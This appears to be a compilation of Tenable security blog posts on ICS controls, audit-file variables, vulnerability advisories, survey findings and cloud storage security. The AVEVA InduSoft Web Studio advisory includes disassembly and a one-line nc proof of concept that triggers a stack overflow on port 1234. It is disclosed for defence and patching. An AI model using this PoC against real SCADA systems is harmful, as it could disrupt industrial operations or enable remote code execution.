The Center for Internet Security (CIS) recently updated their popular CIS Controls– formerly known as the SANS Top 20 – and just published a companion CIS Controls Implementation Guide for Industrial Control Systems. Cody Dumont and I contributed to this Industrial Control System (ICS) guide, in the hope of making it easier for organizations to employ the CIS Controls for protecting OT environments.

Moving toward a common set of IT/OT controls

As more organizations address the challenge of IT/OT convergence, a common set of IT/OT controls is especially valuable.

Most security frameworks focus on either IT or OT. For example, ISO/IEC 27000 focuses on information security management, and ISA99 focuses on manufacturing and control system security. The difference in focus is understandable because IT and OT environments have important differences such as real-time requirements, network protocols and the ability to tolerate active network scanning. These differences have made OT security professionals reluctant to use IT-born security frameworks and solutions in their OT environments.

The U.S. National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity spans IT and OT to promote the protection and resilience of critical infrastructure. Virtually all industry sectors are adopting the NIST Cybersecurity Framework (CSF), first published in 2014. However, CSF Functions (Categories and Subcategories) neither suggest an implementation order nor do they provide detailed control recommendations. Therefore, many organizations adopting the CSF are also adopting the CIS Controls to help them prioritize control implementation and define more granular security controls.

CSF and CIS Control adopters that applied the controls in both IT and OT were required to adapt the CIS Controls before implementing them in OT to ensure sensitive OT networks and devices were not degraded or disrupted. The CIS recognized the need to help organizations adapt the CIS Controls to OT – and, voilà, the CIS Controls Implementation Guide for Industrial Control Systems was born!

CIS Controls Implementation Guide for Industrial Control Systems: How it can help

“ICS Environments may also have many embedded, IP connected devices. These devices often lack the capability to support traditional Information Technology (IT)-grade security control technologies since many run specialized firmware and Real-time Operating Systems (RTOS), have proprietary protocols such as Profibus, COTP, TPKT Modbus and EtherNet/IP, or do not have the ability to support contemporary endpoint of supplicant software that is commonly used in IT systems.”
–CIS Controls Implementation Guide for Industrial Control Systems.

The CIS Controls Implementation Guide for Industrial Control Systems is a companion document to use with the 20 prioritized CIS Controls. Each control includes an introduction, applicability description and additional considerations.

Here are excerpts from the first (and most important) control, Inventory of Authorized and Unauthorized Devices, that will give you a flavor of the guidance provided for each control:

Excerpts from CIS Controls Implementation Guide for Industrial Control Systems

• Introduction:“Understanding and solving the asset inventory and device visibility problem is critical in managing a business’s security program. This is especially challenging in ICS where network segmentation, dual-homing, and isolation are common themes. Mixtures of old and new devices from multiple vendors, lack of up-to-date diagrams, unique industry and application-specific protocols, some of which are not IP-based, and the difficulty in conducting physical inventories in dispersed or hostile environments compound these challenges.”
• Applicability:“The conventional approach of using ping responses, TCP SYN or ACK scans can also be problematic in ICS due to device sensitivity since even seemingly benign scanning employed in IT environments can disrupt communications, or in some cases even impact device operations. Methods that are more passive to locate connected assets are preferred, as they are less likely to impact system availability or interact with vendor systems in a manner that could cause warranty issues.”
• Considerations:“Ensure that all equipment acquisitions and system modifications follow and approval process and the technical drawings (if applicable, automated inventory systems) are updated at the time of the change.”

Resources: Securing converged IT/OT systems

Need a prioritized, common control framework to secure converged IT/OT systems or a common language to facilitate communication? Join me on July 18 for the “Six Common Controls Unite and Strengthen OT/IT Security” webinar.

Also, in case you missed our announcement last year, we’ve partnered with Siemens and released Industrial Security, an on-premises security solution purpose-built for OT. It addresses the guide’s recommendation to passively and safely monitor OT networks to deliver asset discovery. Industrial Security also passively assesses vulnerabilities. For a demo or evaluation of Industrial Security, contact your authorized Tenable representative.

Whether assessing systems against your organization’s own security policy or industry benchmarks and standards, configuration auditing is critical to compliance. Security policies are defined via .audit files. This blog post will help you get the most accurate and complete information when using .audit files.

Trying to determine if your organization’s systems are configured in accordance with your organization’s security and compliance policy – or if they adhere to third-party standards, such as CIS or DISA?

Tenable^® products have a feature built in for configuration auditing, using a wide range of predefined policies for auditing against benchmarks and guides from organizations like CIS and DISA. In addition to the predefined policies, you can download, modify and scan using customized audits. 

The security policy is defined using a file format called an .audit. To quickly customize an .audit file to match an environment, variables are used during the assessment. When using an .audit file, the variable updating is handled as a part of the scan policy.

What are audit variables?

When we develop .audits for configuration auditing, we use variables to easily customize the configuration checks to the customer's accessed environment. One notable example is IP addresses for services in the environment, such as NTP Servers. Because the audit is developed by Tenable, the customer’s IP address is not known in the environment to be accessed. Thus, the audit writer will use a variable to allow the customer to easily replace that value in the audit.

For example, the audit writer would use a variable named NTP_SERVER with a description of Network Time Server and assign a default value of 10.0.0.2. When the audit is selected in a scan policy, the policy should prompt for a value for the Network Time Server, and provide a value of 10.0.0.2.

If the network time server in the environment to be accessed is 192.168.0.2, the customer can enter the real value in the policy. When the scan happens, all instances where @NTP_SERVER@ is used will be replaced with the value entered into the Network Time Server, and evaluated with the new address.

An example line found in an .audit file could be:

regex : "^[\\s]*server[\\s]+@NTP_SERVER@"

The line would be changed to look like this:

regex : "^[\\s]*server[\\s]+192.168.0.2"

And the output in the compliance result could look like this:

How Tenable uses variables

The variables are located in the audit file in a special section used to help enhance the user experience of Tenable products. If you look at the definition of the variables, they appear to be a commented section that could be uncommented and usable.

This section is commented out from the rest of the audit and only used when published through a Tenable product. If the audit is used as a custom audit and uploaded into the policy, this section is currently ignored. Uncommenting the variable would cause an error when the audit is evaluated, if not on upload.

Additionally, audits published on Tenable Audit Downloads are processed by having variables replaced with default values. This allows the audits to be downloaded and immediately used. If the variables values were not replaced in an .audit file, the worst case is the .audit is broken and will not scan. Best case, it will produce unreliable results.

When downloading audits for a custom .audit, the process that replaces the variables with default values also adds comments to identify where the variables were used and with what value they’ve been replaced with. This can help to manually go through the audit and update all the values with the environment-specific values.

How to work with variables

The best way to work with variables in audits is to use the UI to update the value before scanning. This should provide the highest quality in published audits. But, this ignores the power and flexibility of using downloaded and custom audits to adjust to the policies and configurations of the accessed environment.

By using a downloaded audit or creating a custom audit, you can update an audit for special situations, such as:

• Commenting out checks that don’t make sense for the environment
• Forcing unique values for checks due to special cases in the environment
• Forcing a result of a check due to accepted risks in the environment
• Creating new checks for configurations important to the environment

The only way to adjust values in the current custom audit files is to open the file in a text editor, search for comments on where a variable is replaced and change the value in the line below the comment.

Pro tip

For best results, use Atom, Sublime or VS Code as the editor. Atom and Sublime have packages that can be added to enable syntax highlighting for NASL and .audit files.

• Atom package: https://atom.io/packages/language-nasl
• Sublime package: https://github.com/tenable/sublimetext-nasl

Another way to make the variable replacement easier is a script published on GitHub at Replace Variables. Although this python script doesn’t eliminate the need for a text editor, it limits the edits that need to be made to only the variable definition. The steps to update the variable values in this script are:

1. Update the audit file variable definition with the value required in your environment.
2. Run the script against the audit file to create an updated audit.
3. Import the audit into your scanning policy and scan.

You can find an example execution of the script on the GitHub page.

Where do we go from here?

So, how do we improve the use of variables? With Tenable.io, you can quickly make and share improvements, such as:

• Auditing variables processed on import
• Auditing writer workbench to assist in the build and use of audits
• Auditing check library to work with a workbench to copy and modify current checks

And like Bill Kurtis from Wait Wait...Don't Tell Me! would say... Well, if any of that happens, we're going to tell you about it here on the blog.

A new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition can be exploited to compromise sensitive operational technology. AVEVA has released a patch and we advise urgent attention and response from affected end users.

Tenable Research discovered a new critical remote code execution (RCE) vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition. The applications contain a stack buffer overflow that can be exploited to execute arbitrary code on target systems.

These products were previously marketed under the Schneider Electric brand and are now being managed by AVEVA.

Background

InduSoft Web Studio is a suite of tools providing automation building blocks which are used to develop human-machine interfaces (HMIs), Supervisory Control and Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset used to develop applications that connect automation systems and interfaces for web browsers, smartphones and tablets.

Diverse industries -- including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security -- use SCADA in conjunction with operational technology (OT). Because of their critical role in modern infrastructure and the wide range of industries that deploy them, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.

Analysis

Tenable Research found a new stack overflow vulnerability in TCPServer.dll. The vulnerability is in the code to read a 'string' from the received network data. This vulnerability is similar to the one we disclosed in May 2018, but is triggered through command 81 instead of  command 50.

Here’s a description of two data structures in TCPServer.dll to help you understand the vulnerability.

1. The following object (referred here as 'WSTR') is used to store a wide-character string:

 Class WSTR
 {
 vftable;
 unsigned short lbuf[0x40]; // local storage for the string data
 void *pData; // ptr to string data; can point to @lbuf
 int32 DataLen; // length allocated for @pData
 ...
 };

 When the string can fit in lbuf, it should be stored there. Otherwise, heap memory is allocated to store the string.

1. Another object heavily used in TCPServer.dll is the 'TcpServerThreadBuffer' (referred to here as CBuf). This object is used to store, process and manipulate network data received from clients.

Class CBuf
{
 vftable;
 int32 AllocSize; // used for allocation, seen: 0x4000
 int32 CurPos; // current position
 int32 BufSize; // allocated size of @pBuffer
 void *pBuffer; // buffer holding network data; can point to @lbuf
 byte lbuf[0x100]; // local storage for network data
 ...
};


Inside the virtual function table, there are many functions used to read and write various types of command parameters (i.e., byte, boolean, short, int32 and string).

The vulnerability can be triggered via command 81:

[...]
.text:5D43D8B8      xor     eax, eax
.text:5D43D8BA      mov     [ebp+var_wstr.vftable], offset off_5D4CAD5C
.text:5D43D8C4      mov     word ptr [ebp+var_wstr.lbuf], ax ; wstr.lbuf[0] = '\0';
.text:5D43D8CB      mov     [ebp+var_wstr.pData], eax ; wstr.pData = NULL;
.text:5D43D8D1      mov     [ebp+var_wstr.DataLen], eax ; wstr.DataLen = 0;
.text:5D43D8D7      lea     ecx, [ebp+var_wstr]; a wstr object on the stack
.text:5D43D8DD      mov     [ebp+var_4], eax
.text:5D43D8E0      mov     eax, [edi]
.text:5D43D8E2      push    ecx
.text:5D43D8E3      mov     ecx, edi
.text:5D43D8E5      call    [eax+vftCBuf.Cbuf_ReadString] ; Cbuf_ReadString
[...]


Here, the code tries to read a 'string' object from the network data into a WSTR object (which is on the stack). This means wstr.lbuf is a buffer on the stack.

Inside Cbuf_ReadString(), the length of the 'string' object is read, and the function tries to allocate str_len + 1 to store the string:

[...]
.text:5D40C05D      call    Cbuf_ReadStringLength ; return  1, 2, or 4 byte(s)
.text:5D40C062      mov     esi, [ebp+arg_sbuf]
.text:5D40C065      mov     edi, eax ; attacker specifies length 0xffffffff
.text:5D40C067      mov     ecx, esi
.text:5D40C069      lea     edx, [edi+1] ; length wraps to 0 if 0xffffffff
.text:5D40C06C      push    edx
.text:5D40C06D      call    wstr_alloc
[...]


If the attacker specifies 0xFFFFFFFF as the string length, alloc size of 0 is passed to wstr_alloc(), which increments the size by one and checks if the size can fit in the local buffer (wstr.lbuf). Since 1 (0 + 1) is less than 0x40 (countof(wstr.lbuf)), the function returns 1 without allocating heap memory, asssuming wstr.lbuf is big enough to store the string:

[...]
.text:5D40BDD4      mov     edx, [ebp+arg_size]
.text:5D40BDD7      inc     edx ; size++
.text:5D40BDD8      push    edi
.text:5D40BDD9      mov     edi, ecx
.text:5D40BDDB      mov     [ebp+arg_size], edx
.text:5D40BDDE      cmp     edx, 40h
.text:5D40BDE1      jge     short loc_5D40BDEF
.text:5D40BDE3      mov     eax, 1
[...]


Then Cbuf_ReadString() calls a Cbuf method to read in the string data, telling it the stack buffer has 0xffffffff bytes

[...]
.text:5D40C09C      push    edi ; 0xffffffff
.text:5D40C09D      push    ecx ; stack buf
.text:5D40C09E      mov     ecx, ebx
.text:5D40C0A0      call    [eax+vftCBuf.ReadAndConvertToWchars] ; stack overflow!
[...]


which can cause a stack buffer overflow:

STATUS_STACK_BUFFER_OVERRUN encountered
(9e8.b28): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
kernel32!UnhandledExceptionFilter+0x5f:
766ce331 cc              int     3
0:020> kb
 # ChildEBP RetAddr  Args to Child              
00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 
01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
WARNING: Stack unwind information not available. Following frames may be wrong.
02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
[...]

Proof of Concept (PoC)

Below is the PoC to trigger the stack buffer overflow:

cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234

Business impact

These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks.

AVEVA and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.

Solution

AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to remediate this vulnerability. Update the application by applying the appropriate patches:

• If you’re using InduSoft Web Studio v8.1 SP1 or prior versions, you should upgrade and apply InduSoft Web Studio Hotfix 81.1.00.08 as soon as possible.
• If you’re using InTouch Machine Edition 2017 v8.1 SP1 or prior versions, you should upgrade and apply InTouch Machine Edition Hotfix 81.1.00.08 as soon as possible.

Additional information

• AVEVA Security Bulletin
• Tenable Research Advisory
• May 2018 Tenable Research Advisory for Schneider Electric InduSoft Web Studio and InTouch Machine Edition Remote Code Execution
• Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

Cisco’s Policy Suite for Mobile controls billing and access control for customer devices. Root access to this suite is concerning because of the breadth of user device access.

The latest batch of Cisco patches includes fixes for four critical vulnerabilities related to unauthenticated access and default credentials in the Cisco Policy Suite for the Cisco Mobility Services Engine. All four were discovered by internal security testing. In addition, nine high-severity vulnerabilities and 12 medium ones were patched in a variety of other Cisco platforms.

Analysis

Two of the vulnerabilities (CVE-2018-0376 and CVE-2018-0374) give unauthenticated access to the Policy Builder database and interface, respectively, allowing for unauthorized changes to take place. CVE-2018-0377 affects the Open Systems Gateway initiative (OSGi) interface of the Policy Builder Suite and allows the remote attacker to access or change any files that are accessible by the OSGi process. The last critical patch (CVE-2018-0375) involves default credentials in the Cluster Manager of the Suite giving the attacker remote root access.

These Cisco vulnerabilities received a CVSS v3.0 score of 9.8 out of 10, indicating a "critical" degree of severity.

Cisco’s Policy Suite for Mobile controls billing and access control for customer devices. According to Cisco’s configuration documentation, the policy suite controls mobile user configuration and active session tracking. Root access to this suite is concerning because of the breadth of user device access.

Below is a visualization of the scope of mobile elements that this software interacts with.

(Source: Cisco)

Solution

The OSGi interface unauthenticated access vulnerability (CVE-2018-0377) affects Cisco Policy Suite releases prior to Release 18.1.0 and is fixed in Cisco Policy Suite Release 18.1.0.

The Cisco Policy Suite Policy Builder Unauthenticated Access Vulnerability (CVE-2018-0376), Cisco Policy Suite Policy Builder Database Unauthenticated Access Vulnerability (CVE-2018-0374) and Cisco Policy Suite Cluster Manager Default Password Vulnerability (CVE-2018-0375) affect releases prior to 18.2.0 and are fixed in Cisco Policy Suite Release 18.2.0. CVE-2018-0375 contains a workaround script (change_passwd.sh) that can be used to update the existing default password.

Additional Information

Critical Cisco Security Advisories:

• OSGi interface unauthenticated access vulnerability (CVE-2018-0377)
• Cisco Policy Suite Policy Builder Database Unauthenticated Access Vulnerability (CVE-2018-0374)
• Cisco Policy Suite Cluster Manager Default Password Vulnerability (CVE-2018-0375)
• Cisco Policy Suite Policy Builder Unauthenticated Access Vulnerability (CVE-2018-0376)

Learn more about Tenable.io,® the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Today, Tenable officially became a public company, trading on the Nasdaq under the ticker symbol TENB.

As we embark on our new chapter as a public company, I want to take this moment to thank each of you, our loyal customers. Our company was founded on a mission to help you solve some of the hardest challenges around understanding where you are vulnerable. We built this company in close collaboration with the security community to make sure we are continuously adapting and growing as your needs change.

Rest assured, the foundations that made Tenable the global cybersecurity leader it is today will not change as we chart a larger path forward. In fact, operating as a public company will give us the ability to accelerate on our vision, our product development and our ability to help you understand and reduce Cyber Exposure in this age of digital transformation.

We are committed to our vision of helping you gain visibility across the entirety of the modern attack surface – whether it’s IT assets, cloud environments, IoT devices or Operational Technology systems. We are also excited to bring Tenable.io Lumin to market, which will provide deep analytics to help security and business executives translate vulnerability data into business insights through prioritization, benchmarking and measurement of Cyber Exposure. We are going to transform how security is managed and measured – together!

To all of our customers, thank you for putting your trust in Tenable. We remain laser focused to make sure we’re delivering on our mission, and that we continue to deliver the world-class products, services and support that you have come to expect from us.

And, while none of us can predict the future, I’m sure of one thing – I couldn’t be more proud or more excited to work alongside such an awesome team and to partner with such amazing customers.

Thank you for your loyalty and support.

Amit

When it comes to communicating with the C-suite and Board of Directors about their organization’s cyber exposure, few IT and security professionals are happy with the benchmarking data currently available.

The ability to proactively measure and demonstrate how cyber exposure risk changes over time is crucial to communicating the value of cybersecurity investments to the C-suite and Board of Directors. Equally important is the ability to show how an organization’s cyber exposure management efforts compare to that of its peers. Yet, the vast majority of IT and cybersecurity professionals surveyed by Tenable said they’re not happy with the benchmarking data they use to demonstrate the effectiveness of their security program to business leaders.

These are the findings of a poll we conducted during last month’s Infosecurity Europe conference in London. Nearly three quarters (73%) of the 280 IT and security professionals we polled at the event confirmed the importance of using metrics to benchmark their cyber exposure.

The majority of respondents (80%) said they see value in sharing benchmarking data to demonstrate the effectiveness of their security program to the Board of Directors or C-suite. Yet, only 59% of respondents said they currently leverage benchmarking data.

Even more alarming, a fifth of respondents (21%) said they do not currently use any benchmark data when communicating with the Board of Directors or C-suite -- though they would like to do so. Only 18% said they see no value in sharing such data with C-level leadership.

Why Cyber Exposure Benchmarking Matters

In order to understand where an organization is exposed, and determine which cybersecurity efforts are most effective, you need visibility into vulnerabilities and threats. But such visibility is only the beginning. You also need the ability to analyze the data and track the organization’s ability to react appropriately when issues are discovered.

Data showing how your cyber exposure posture has improved over time -- and how it stacks up against that of your industry peers -- allows you to demonstrate the value of your cybersecurity investments and support your requests for additional resources. The ability to share these cyber exposure benchmarks with your C-suite and board helps you improve their understanding of the organization’s risk posture.

The majority of survey respondents (54%) said they are already comparing their organization’s metrics against those of their industry peers. Yet, more than a third of these respondents (35%) say they would like comparative peer data; only 19% said they are happy with the benchmark data available. More than a quarter of respondents (26%) said they don’t currently benchmark against their peers and would like to do so.

What does effective cyber exposure benchmarking look like?

Through our work with cybersecurity professionals, we’ve identified four key questions every organization needs to be able to answer to communicate cyber risk to the business:

• Where are we exposed?
• Where should we prioritize efforts based on risk?
• How are we reducing our exposure over time?
• How does our cyber hygiene compare to our peers?

We recognize how challenging it is in today’s enterprise environment for you to answer these key questions. You’re faced with a mountain of data, much of it static and drawn from multiple spreadsheets, and you’re expected to turn it into the kinds of insights business leaders can use. Effective cyber exposure benchmarking requires live and holistic visibility across every asset in your organization -- not only your IT assets and cloud infrastructure, but your organization’s internet of things (IoT) tools and industrial control systems.

Cyber exposure benchmarking provides an objective way for you to measure and communicate cyber risk to business leaders, who can then use it to make strategic decisions. Knowing which areas of your business are secure - or exposed - and measuring your organization against a larger set of peer data opens up a whole new set of discussions and decisions about where your organization needs to focus.

Learn more about cyber exposure

• Read the blog post: Cyber Exposure: The Next Frontier for Security.
• Download the pdf: Reducing Cyber Exposure: From Cloud To Containers.
• Read the Whitepaper: Cyber Exposure for Dummies.

An Adobe Reader double free vulnerability on Windows and macOS systems earns the nod for its interesting discovery and patch story.

Novelty, sophistication or just plain weirdness are some of the potential criteria we use to select the Tenable vulnerability of the month. We collect nominations from our 70+ research team members, shortlist the finalists and give the entire team the chance to vote -- combining the total experience and knowledge of Tenable Research to identify the vulnerability of the month.

Background

This month, Tenable Research highlights CVE-2018-4990, an Adobe Reader double free vulnerability on Windows and macOS systems. CVE-2018-4990 has an interesting discovery and patch story. It was discovered by ESET researchers in March 2018 because the developers uploaded their malicious PDF to their public repository. Because the sample didn’t contain the final payload, researchers concluded it was still in development. The researchers disclosed this vulnerability -- along with CVE-2018-8120, a privilege escalation bug in Microsoft Windows -- to the vendors. Security patches were issued in mid-May.

What makes this the vulnerability of the month?

It’s always interesting when the (potential) attackers tip their hands. Uploading malicious samples to a public repository while they’re still in development wasn’t the smartest move, assuming stealth was desired. Uploading the incomplete sample might have been a tactic to determine if any antivirus software would detect it. The samples “demonstrated a high level of skills in vulnerability discovery and exploit writing," according to ESET.

This is also an excellent example of how vulnerabilities can be chained to achieve remote code execution with highest privileges. Had the vulnerabilities not been discovered and patched before the exploits were fully developed, it’s likely they would have been widely used by attackers, particularly in exploit kits, with potentially disastrous consequences.

Vulnerability details

This vulnerability impacts Adobe Reader/DC 2018.011.20038 and earlier versions along with Adobe Acrobat Reader 2017/DC 2017.011.30079 and earlier versions.

An attacker who successfully exploits the vulnerability could achieve arbitrary code execution in the context of the current user. While the malicious PDF is available on VirusTotal, we are not aware of any reports of these vulnerabilities being exploited in the wild yet.

When the two vulnerabilities (CVE-2018-4990 and CVE-2018-8120) are combined, as they were in the upload to VirusTotal, an attacker could gain complete control of an affected system. We’ve released the following Nessus® plugins to assist our customers in finding and securing their exposure to CVE-2018-4990 as well as the other vulnerabilities patched in the update.

Additional resources

• Adobe Security Bulletin
• ESET

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

The “Underminer” exploit kit is having widespread impact in Asian countries, particularly Japan. Thankfully, mitigation is relatively simple and involves patching and other well-known security best practices.

Contrary to popular belief, the exploit kit is not dead yet. “Underminer,” an exploit kit named and discovered by Trend Micro, is having widespread impact in Asian countries, particularly Japan. Its nefarious bootkit affects the system’s boot sectors and delivers the coin mining payload named Hidden Mellifera.

While the continued decline of Adobe Flash has led to a reduction in the prevalence of Exploit Kits, enterprises need to remember this attack vector remains a real problem. Underminer is quite sophisticated and has many of the capabilities utilized by other problematic exploit kits, including user-agent/browser profiling to determine Flash Player version and cookie detection to prevent repeated exploit site visits. In addition, RSA encryption of traffic is utilized prior to exploitation.

The following diagram from Trend Micro provides a useful high-level view of the stages and vectors of Underminer:

Source: Trend Micro, https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/07/underminer-exploit-kit-4.png.

As of 4:45 am EDT on July 27, the antivirus (AV) programs tested by VirusTotal have very limited coverage of the provided SHA-256 checksums (3/40). However, that’s bound to change with time and is likely due to the localized exploitation. Thankfully, mitigation is relatively simple and involves patching and other well-known security best practices, such as preventing unnecessary browser plugins, good firewall hygiene, antivirus updates, user awareness and so on.

Antivirus programs tested by VirusTotal

Source: VirusTotal, https://www.virustotal.com/#/file/a795deaa2d1c1f2d9426a8c28791111e0192ffad14d086b51bc61c8e16008b63/detection.

Tenable’s Coverage for Underminer Exploit Kit

Additional Information:

• Trend Micro Blog
• Trend Micro Analysis

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Our latest research examines real-world vulnerability assessment practices at 2,100 organizations to understand how defenders are approaching this crucial step in cyber hygiene.

For our latest research study, "Cyber Defender Strategies: What Your Vulnerability Assessment Practices Reveal," we explore how organizations are practicing vulnerability assessment (VA), and what these practices teach us about cyber maturity.

Our curiosity was piqued by our previous study, “Quantifying the Attacker's First-Mover Advantage,” which found it takes attackers a median of five days to gain access to a functioning exploit. In contrast, we learned, defenders take a median 12 days to assess for a vulnerability. The difference between the two results is a median seven-day window of opportunity for an attacker to strike, during which a defender isn’t even aware they’re vulnerable. This led us to consider how defenders are performing in the all-important discovery and assess phases of the Cyber Exposure Lifecycle.

Our Cyber Defender Strategies Report specifically focuses on key performance indicators (KPIs) associated with the Discover and Assess stages of the five-phase Cyber Exposure Lifecycle. During the first phase – Discover – assets are identified and mapped for visibility across any computing environment. The second phase – Assess – involves understanding the state of all assets, including vulnerabilities, misconfigurations, and other health indicators. While these are only two phases of a longer process, together they decisively determine the scope and pace of subsequent phases, such as prioritization and remediation.

We wanted to learn more about how end users are conducting vulnerability assessment in the real world, what this tells us about their overall maturity level, and how this varies based on demographics.

Cyber Defender Strategies: Understanding Vulnerability Assessment KPIs

For our Cyber Defender Strategies Report, we analyzed five key performance indicators (KPIs) based on real-world end user vulnerability assessment behavior. These KPIs correlate to four VA maturity styles: Diligent, Investigative, Surveying and Minimalist.

We discovered about half (48%) of the enterprises included in the data set are practicing very mature (exhibiting a Diligent or Investigative style) vulnerability assessment strategies. However, just over half (52%) exhibit moderate- to low-level VA maturity (exhibiting a Surveying or Minimalist style). We’ll tell you more about what all this means in a moment. First, let’s take a quick look at the methodology we applied to arrive at these results.

To identify our four VA Styles, we trained a machine learning algorithm called archetypal analysis (AA) with anonymized scan telemetry data from more than 2,100 individual organizations in 66 countries. We analyzed just over 300,000 scans during a three-month period from March to May 2018. We identified a number of idealized VA behaviors within this data set and assigned organizations to groups defined by the archetype to which they most closely relate. The vulnerability assessment characteristics for each defender style are described in the table below.

Four Vulnerability Assessment Styles: What They Reveal

Source: Tenable Cyber Defender Strategies Report, August 2018.

Here’s what we learned about each vulnerability assessment style:

• Only five percent of enterprises follow the Diligent style, displaying a high level of maturity across the majority of KPIs. Diligent followers conduct frequent vulnerability assessments with comprehensive asset coverage, as well as targeted, customized assessments for different asset groups and business units.
• Forty-three percent follow the Investigative style, indicating a medium to high level of maturity. These organizations display a good scan cadence, leverage targeted scan templates, and authenticate most of their assets.
• Nineteen percent of enterprises follow the Surveying style, placing them at a low to medium maturity level. Surveyors conduct broad-scope assessments, but with little authentication and little customization of scan templates.
• Thirty-three percent of enterprises are at a low maturity, following the Minimalist style and conducting only limited assessments of selected assets.

Tenable Cyber Defender Strategies Report: Key Findings

Source: Tenable, Cyber Defender Strategies Report, August 2018.

Vulnerability Assessment Matters at Every Maturity Level

By now, you’re probably forming an opinion about how your vulnerability assessment strategies stack up. If your organization seems to be leaning toward the lower-maturity Surveying or Minimalist styles, fear not. There is nothing wrong with being at a low maturity. What is wrong is choosing to remain there.

If you’re a later adopter, it means you have more work to do to catch up. It also means you can learn from the mistakes and experiences of early adopters. Rather than having your organization serve as a testing bed for untried, novel and immature solutions, you’ll benefit from the availability of tried-and-tested offerings. There’s also an existing pool of expertise you can tap into, rather than trying to develop your strategies from scratch. Skipping the experimentation phase, you are poised to jump right into optimization and innovation.

And, if you identify with the most mature vulnerability assessment strategies highlighted here, it doesn’t mean you can take a lengthy sabbatical. Even the most sophisticated defenders know their work is never done.

The ultimate objective – regardless of which style most closely aligns to your own – is to always keep evolving toward a higher level of maturity. We know it isn’t easy. Cybersecurity professionals are hauling a lot of historical baggage. You’re dealing with legacy technology and dependencies alongside the complexities of managing a growing portfolio of continuously evolving and emerging technologies. Meanwhile, the threat environment has escalated noticeably over the past few years. And all of this is happening against a backdrop of competitive business pressures.

When it comes to cybersecurity, we have hit escape velocity, and most organizations now get it.

Our Cyber Defender Strategies Report provides recommendations for each VA style, to help you advance to the next maturity level. We also explore how these four VA styles are distributed across major industry verticals and by organization size, so you can compare yourself with your peers. Click to download the full report.

Learn More:

• Cyber Defender Strategies Report: What Your Vulnerability Assessment Practices Reveal
• Quantifying the Attacker’s First-Mover Advantage
• Cyber Exposure: The New Critical Risk Metric for Your Business
• Cyber Exposure For Dummies

Amazon Web Service (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Here are five solutions you can use to evaluate the security of data stored in your S3 buckets.

For business professionals, the public cloud is a smorgasbord of micro-service offerings which provide rapid delivery of hardware and software solutions. For security and IT professionals, though, public cloud adoption represents a constant struggle to secure data and prevent unexpected exposure of private and confidential information. Balancing these requirements can be tricky, especially when trying to adhere to your organization’s unique Corporate Information Security Policies and Standards.

Amazon Web Service (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Industry researchers and analysts most often attribute the root cause of the data loss to misconfigured services, vulnerable applications/tools, wide-open permissions, and / or usage of default credentials.

Recent examples of data leaks from AWS storage buckets include:

• The discovery of billions of online posts and news commentary collected by the U.S. Department of Defense and stored in publicly accessible AWS S3 buckets.
• Sensitive personal data of thousands of insurance policyholders left exposed in a storage bucket that was not password protected.
• More than 60,000 sensitive files stored by defense contractor Booz Allen Hamilton on a publicly accessible AWS storage server.
• The personal details of hundreds of thousands of U.S. voters reportedly exposed by robocall firm RoboCent.

Data leakage is only one of the many risks presented by misuse of AWS S3 buckets. For example, attackers could potentially replace legitimate files with malicious ones for purposes of cryptocurrency mining or drive-by attacks.

To make matters worse for organizations (and simpler for hackers), automated tools are available to help find insecure S3 buckets.

How to protect data stored in AWS S3 buckets

Going back to the basics provides the most direct path to protecting your data. Recommended best practices for S3 buckets include always applying the principle of least privileges by using IAM policies and resource-based controls via Bucket Policies and Bucket ACLs.

Another best practice is to define a clear strategy for bucket content by taking the following steps:

• Creating automated monitoring / audits / fixes of S3 bucket security changes via Cloud Trail, Cloud Watch and Lambda.
• Creating a bucket lifecycle policy to transfer old data to an archive automatically based on usage patterns and age.
• When creating new buckets, applying encryption by default via server-side encryption (SSE-S3/SSE-C/SSE-KMS) and / or client-side encryption.
• Creating an S3 inventory list to automatically report inventory, replication and encryption in an easy to use CSV / ORC format.
